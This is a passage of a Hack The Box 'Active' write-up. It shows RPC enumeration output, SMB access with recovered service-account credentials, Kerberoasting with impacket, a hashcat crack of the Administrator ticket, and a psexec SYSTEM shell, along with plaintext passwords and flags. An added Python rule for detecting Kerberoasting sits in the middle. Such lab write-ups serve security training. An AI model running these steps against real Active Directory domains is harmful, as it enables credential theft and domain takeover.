UUID : DD490425-5325-4565-B774-7E27D6C09C24 v1.0 Base Firewall Engine API
Bindings:
ncalrpc:[LRPC-31485e4410b15e855e]

Protocol: N/A
Provider: N/A
UUID : 7F1343FE-50A9-4927-A778-0C5859517BAC v1.0 DfsDs service
Bindings:
ncacn_np:\\DC[\PIPE\wkssvc]
ncalrpc:[DNSResolver]

Protocol: [MS-NRPC]: Netlogon Remote Protocol
Provider: netlogon.dll
UUID : 12345678-1234-ABCD-EF00-01234567CFFB v1.0
Bindings:
ncacn_ip_tcp:10.10.10.100[49158]
ncacn_http:10.10.10.100[49157]
ncalrpc:[NTDS_LPC]
ncalrpc:[OLE4A09CF1A849D414E9ED4E1CEE73F]
ncacn_ip_tcp:10.10.10.100[49155]
ncalrpc:[samss lpc]
ncalrpc:[dsrole]
ncacn_np:\\DC[\PIPE\protected_storage]
ncalrpc:[protected_storage]
ncalrpc:[lsasspirpc]
ncalrpc:[lsapolicylookup]
ncalrpc:[LSARPC_ENDPOINT]
ncalrpc:[securityevent]
ncalrpc:[audit]
ncalrpc:[LRPC-9c60b710cc00f52bc7]
ncacn_np:\\DC[\pipe\lsass]

Protocol: [MS-SAMR]: Security Account Manager (SAM) Remote Protocol
Provider: samsrv.dll
UUID : 12345778-1234-ABCD-EF00-0123456789AC v1.0
Bindings:
ncacn_ip_tcp:10.10.10.100[49158]
ncacn_http:10.10.10.100[49157]
ncalrpc:[NTDS_LPC]
ncalrpc:[OLE4A09CF1A849D414E9ED4E1CEE73F]
ncacn_ip_tcp:10.10.10.100[49155]
ncalrpc:[samss lpc]
ncalrpc:[dsrole]
ncacn_np:\\DC[\PIPE\protected_storage]
ncalrpc:[protected_storage]
ncalrpc:[lsasspirpc]
ncalrpc:[lsapolicylookup]
ncalrpc:[LSARPC_ENDPOINT]
ncalrpc:[securityevent]
ncalrpc:[audit]
ncalrpc:[LRPC-9c60b710cc00f52bc7]
ncacn_np:\\DC[\pipe\lsass]

Protocol: [MS-LSAT]: Local Security Authority (Translation Methods) Remote
Provider: lsasrv.dll
UUID : 12345778-1234-ABCD-EF00-0123456789AB v0.0
Bindings:
ncacn_http:10.10.10.100[49157]
ncalrpc:[NTDS_LPC]
ncalrpc:[OLE4A09CF1A849D414E9ED4E1CEE73F]
ncacn_ip_tcp:10.10.10.100[49155]
ncalrpc:[samss lpc]
ncalrpc:[dsrole]
ncacn_np:\\DC[\PIPE\protected_storage]
ncalrpc:[protected_storage]
ncalrpc:[lsasspirpc]
ncalrpc:[lsapolicylookup]
ncalrpc:[LSARPC_ENDPOINT]
ncalrpc:[securityevent]
ncalrpc:[audit]
ncalrpc:[LRPC-9c60b710cc00f52bc7]
ncacn_np:\\DC[\pipe\lsass]

Protocol: [MS-DRSR]: Directory Replication Service (DRS) Remote Protocol
Provider: ntdsai.dll
UUID : E3514235-4B06-11D1-AB04-00C04FC2DCD2 v4.0 MS NT Directory DRS Interface
Bindings:
ncacn_http:10.10.10.100[49157]
ncalrpc:[NTDS_LPC]
ncalrpc:[OLE4A09CF1A849D414E9ED4E1CEE73F]
ncacn_ip_tcp:10.10.10.100[49155]
ncalrpc:[samss lpc]
ncalrpc:[dsrole]
ncacn_np:\\DC[\PIPE\protected_storage]
ncalrpc:[protected_storage]
ncalrpc:[lsasspirpc]
ncalrpc:[lsapolicylookup]
ncalrpc:[LSARPC_ENDPOINT]
ncalrpc:[securityevent]
ncalrpc:[audit]
ncalrpc:[LRPC-9c60b710cc00f52bc7]
ncacn_np:\\DC[\pipe\lsass]

Protocol: N/A
Provider: spoolsv.exe
UUID : 4A452661-8290-4B36-8FBE-7F4093A94978 v1.0 Spooler function endpoint
Bindings:
ncalrpc:[spoolss]

Protocol: [MS-PAN]: Print System Asynchronous Notification Protocol
Provider: spoolsv.exe
UUID : AE33069B-A2A8-46EE-A235-DDFD339BE281 v1.0 Spooler base remote object endpoint
Bindings:
ncalrpc:[spoolss]

Protocol: [MS-PAN]: Print System Asynchronous Notification Protocol
Provider: spoolsv.exe
UUID : 0B6EDBFA-4A24-4FC6-8A23-942B1ECA65D1 v1.0 Spooler function endpoint
Bindings:
ncalrpc:[spoolss]

Protocol: [MS-SCMR]: Service Control Manager Remote Protocol
Provider: services.exe
UUID : 367ABB81-9844-35F1-AD32-98F038001003 v2.0
Bindings:
ncacn_ip_tcp:10.10.10.100[49165]

Protocol: [MS-DNSP]: Domain Name Service (DNS) Server Management
Provider: dns.exe
UUID : 50ABC2A4-574D-40B3-9D66-EE4FD5FBA076 v5.0
Bindings:
ncacn_ip_tcp:10.10.10.100[49170]

Protocol: [MS-RPRN]: Print System Remote Protocol
Provider: spoolsv.exe
UUID : 12345678-1234-ABCD-EF00-0123456789AB v1.0 IPSec Policy agent endpoint
Bindings:
ncalrpc:[LRPC-20f5dbf2ea38092089]
ncacn_ip_tcp:10.10.10.100[49171]

Protocol: [MS-FASP]: Firewall and Advanced Security Protocol
Provider: FwRemoteSvr.dll
UUID : 6B5BDD1E-528C-422C-AF8C-A4079BE4FE48 v1.0 Remote Fw APIs
Bindings:
ncacn_ip_tcp:10.10.10.100[49171]

Protocol: [MS-CMPO]: MSDTC Connection Manager:
Provider: msdtcprx.dll
UUID : 906B0CE0-C70B-1067-B317-00DD010662DA v1.0
Bindings:
ncalrpc:[LRPC-320bf429bfff7fae04]
ncalrpc:[OLED55A94FD74F04190AACC4CAFABEE]
ncalrpc:[LRPC-16d6d49426bc6db49e]
ncalrpc:[LRPC-16d6d49426bc6db49e]
ncalrpc:[LRPC-16d6d49426bc6db49e]
ncalrpc:[LRPC-16d6d49426bc6db49e]

Protocol: [MS-FRS2]: Distributed File System Replication Protocol
Provider: dfsrmig.exe
UUID : 897E2E5F-93F3-4376-9C9C-FD2277495C27 v1.0 Frs2 Service
Bindings:
ncacn_ip_tcp:10.10.10.100[5722]
ncalrpc:[OLE9573A34B3B1F4146973CF1038961]

[*] Received 154 endpoints.

14. Only after looking at the guided mode did I realise that the first flag is also read over SMB here. I kept assuming that, having the account and password, I should be able to get an initial shell, but after trying every tool I could not get in, so the only way to get the first flag was over SMB.

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient //10.10.10.100/Users -U active.htb\\SVC_TGS%GPPstillStandingStrong2k18
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sat Jul 21 22:39:20 2018
.. DR 0 Sat Jul 21 22:39:20 2018
Administrator D 0 Mon Jul 16 18:14:21 2018
All Users DHSrn 0 Tue Jul 14 13:06:44 2009
Default DHR 0 Tue Jul 14 14:38:21 2009
Default User DHSrn 0 Tue Jul 14 13:06:44 2009
desktop.ini AHS 174 Tue Jul 14 12:57:55 2009
Public DR 0 Tue Jul 14 12:57:55 2009
SVC_TGS D 0 Sat Jul 21 23:16:32 2018

5217023 blocks of size 4096. 279064 blocks available
smb: \> get \SVC_TGS\desktop\user.txt
getting file \SVC_TGS\desktop\user.txt of size 34 as \SVC_TGS\desktop\user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \>

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat '\SVC_TGS\desktop\user.txt'
bc50f1c04f9316658fedf875868b336a

0x02 Obtaining system privileges

15. The account obtained above is a domain user account, so a Kerberoasting attack can be attempted

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo impacket-GetUserSPNs -request -dc-ip 10.10.10.100 active.htb/SVC_TGS
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-19 03:06:40.351723 2024-03-15 17:05:11.452955



[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$052f2de9d612acac8214e11b3627e17b$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

16. The account obtained at the start even has TGS in its name, which is itself a hint toward this attack

17. Next, try to crack the password

┌──(kali㉿offsec)-[~/Desktop]
└─$ touch Administrator.hash

┌──(kali㉿offsec)-[~/Desktop]
└─$ hashcat -h | grep -i "kerberos"
19600 | Kerberos 5, etype 17, TGS-REP | Network Protocol
19800 | Kerberos 5, etype 17, Pre-Auth | Network Protocol
28800 | Kerberos 5, etype 17, DB | Network Protocol
19700 | Kerberos 5, etype 18, TGS-REP | Network Protocol
19900 | Kerberos 5, etype 18, Pre-Auth | Network Protocol
28900 | Kerberos 5, etype 18, DB | Network Protocol
7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth | Network Protocol
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
18200 | Kerberos 5, etype 23, AS-REP | Network Protocol

18. The password is cracked successfully

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo hashcat -m 13100 Administrator.hash /usr/share/wordlists/rockyou.txt --show
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$052f2de9d612acac8214e11b3627e17b$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:Ticketmaster1968
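Added example, not part of the original writeup: detection logic for the Kerberoasting step above, run over constructed Windows Security event 4769 records. The $krb5tgs$23$ prefix of the hash cracked above means the service ticket was issued with RC4-HMAC (etype 0x17, hashcat mode 13100), so the rule flags successful RC4 service-ticket requests for user-account SPNs and then looks for one client requesting several such tickets in a short window. Field names follow the 4769 EventData schema; every record value below (users, SPNs, addresses, times) is constructed.

```python
"""Flag Kerberoasting-style TGS requests in Windows Security event 4769 records.

Standard library only. SAMPLE_EVENTS is constructed for this example; the
keys mirror the 4769 EventData field names. The per-event rule keys on the
RC4-HMAC encryption type that produces "$krb5tgs$23$" hashes; the aggregate
rule catches the burst that tools like GetUserSPNs -request produce.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # Kerberos etype 23; AES tickets are 0x11 / 0x12

# Constructed 4769 records (ISO times, Status 0 = ticket issued).
SAMPLE_EVENTS = [
    {"time": "2024-03-15T17:00:02", "TargetUserName": "jdoe@ACTIVE.HTB",
     "ServiceName": "DC$", "IpAddress": "10.10.10.55",
     "TicketEncryptionType": 0x12, "Status": 0x0},        # normal AES ticket
    {"time": "2024-03-15T17:05:10", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "krbtgt", "IpAddress": "10.10.14.5",
     "TicketEncryptionType": RC4_HMAC, "Status": 0x0},    # TGT renewal, not an SPN
    {"time": "2024-03-15T17:05:11", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "Administrator", "IpAddress": "10.10.14.5",
     "TicketEncryptionType": RC4_HMAC, "Status": 0x0},
    {"time": "2024-03-15T17:05:11", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "svc_sql", "IpAddress": "10.10.14.5",
     "TicketEncryptionType": RC4_HMAC, "Status": 0x0},
    {"time": "2024-03-15T17:05:12", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "svc_web", "IpAddress": "10.10.14.5",
     "TicketEncryptionType": RC4_HMAC, "Status": 0x0},
    {"time": "2024-03-15T17:05:30", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "svc_sql", "IpAddress": "10.10.14.5",
     "TicketEncryptionType": RC4_HMAC, "Status": 0x1B},   # failed request: ignored
]


def is_user_account_spn(service_name: str) -> bool:
    """Machine accounts end in '$' and krbtgt is the KDC itself; Kerberoasting
    targets tickets issued for ordinary user accounts that own an SPN."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def rc4_user_spn_requests(events: list) -> list:
    """Per-event rule: successful RC4 service ticket for a user-account SPN."""
    return [e for e in events
            if e["TicketEncryptionType"] == RC4_HMAC and e["Status"] == 0
            and is_user_account_spn(e["ServiceName"])]


def burst_requesters(events: list, window: timedelta = timedelta(minutes=5),
                     min_services: int = 3) -> list:
    """Aggregate rule: one (requesting user, client IP) pair obtaining RC4
    tickets for at least min_services distinct user-account SPNs within window."""
    by_source = defaultdict(list)
    for e in rc4_user_spn_requests(events):
        by_source[(e["TargetUserName"], e["IpAddress"])].append(e)

    findings = []
    for (user, ip), evs in by_source.items():
        evs.sort(key=lambda e: e["time"])
        times = [datetime.fromisoformat(e["time"]) for e in evs]
        start = 0
        for end in range(len(evs)):               # sliding window over the sorted events
            while times[end] - times[start] > window:
                start += 1
            services = {e["ServiceName"] for e in evs[start:end + 1]}
            if len(services) >= min_services:
                findings.append({"user": user, "ip": ip, "services": sorted(services),
                                 "first": evs[start]["time"], "last": evs[end]["time"]})
                break                               # one finding per source is enough
    return findings


if __name__ == "__main__":
    for hit in rc4_user_spn_requests(SAMPLE_EVENTS):
        print(f"[*] RC4 ticket for SPN owner {hit['ServiceName']} requested by "
              f"{hit['TargetUserName']} from {hit['IpAddress']} at {hit['time']}")
    for b in burst_requesters(SAMPLE_EVENTS):
        print(f"[!] Kerberoasting burst: {b['user']} from {b['ip']} requested "
              f"{len(b['services'])} SPNs ({', '.join(b['services'])}) "
              f"between {b['first']} and {b['last']}")
```

RC4 service tickets still appear legitimately in domains with legacy hosts, so the per-event rule is a triage signal and the burst rule is the one worth alerting on; the lasting fix is AES-only service accounts with long random passwords.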

19. This account is certainly a high-privilege one, so psexec gets the final privileges directly

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-psexec Administrator@10.10.10.100
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file iwdGuZKE.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service TGMI on 10.10.10.100.....
[*] Starting service TGMI.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32> cd C:\User\Administrator\Desktop
The system cannot find the path specified.

C:\Windows\system32> cd C:\User\Administrator\
The system cannot find the path specified.

C:\Windows\system32> cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 15BB-D59C

Directory of C:\Users\Administrator\Desktop

[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
21/01/2021 06:49 �� <DIR> .

[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
21/01/2021 06:49 �� <DIR> ..

[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
15/03/2024 11:05 �� 34 root.txt

1 File(s) 34 bytes
2 Dir(s) 1.164.869.632 bytes free

C:\Users\Administrator\Desktop> type root.txt
3307d76b38563708f46138b9d420e2ba

C:\Users\Administrator\Desktop>

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/148


Source: https://sh1yan.top/2024/03/14/Active-htb-writeup/
Author: shiyan
Published: March 14, 2024